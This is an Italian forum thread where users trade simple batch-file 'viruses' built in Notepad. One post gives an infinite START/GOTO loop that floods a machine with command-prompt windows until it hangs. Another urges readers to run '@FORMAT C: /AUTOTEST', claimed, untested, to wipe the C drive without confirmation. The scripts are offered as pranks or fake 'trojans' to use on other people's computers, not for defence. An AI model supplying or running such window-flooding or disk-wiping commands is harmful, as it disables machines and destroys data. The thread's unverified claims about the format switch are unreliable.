scusate l'ignoranza ma che succede se si scrive più volte GOTO?
sei un lamer.-.. se studiavi il dos sapevi che bastava fare
:1
start
goto 1
e avivi start infiniti...
LAMER!
se studiavi il batch scoprivi che il codice che hai postato fa schifo e che gli start si aprono molto lentamente e che chiudendo il principale si chiusono tutti :Muhaha:
Wow devo provare
cmq sto scrivendo un sacco di START
concordo e poi basta scrivere su youtube come fare impallare il pc ce ne sono a migliaia e poi credo che la fonte sia tua nn credo che ci voglia il miglior hack del mondo per creare una guida cosi e poi dico all'inizio hai scritto se volevamo creare virus ma era trpp difficile questo e un semplice coso col blokko note creare virus e un'altra cosa e poi sono molto piu dannificiBoooh... Non riesco a capire tutti questi grazie.. E' un semplicissimo file bat che apre tante finestre del DOS (prompt dei comandi)... E' sicuramente semplice ed efficace, ma booohhhh...
Allora fate il solito @FORMAT C: /AUTOTEST che dovrebbe formattare il disco c senza chiedere conferma all'utente (per via del comando "autotest")...(mai testato di persona)...
Tutti i file batch (bat) vengono spacciati in internet come trojan..
Se cercate in google "creare trojan blocco note" troverete migliaia di finti "trojan" come questo...
Cmq è semplice e funzionale, ma mi sembra fin troppo semplice per ricevere tutti questi post di ringraziamento....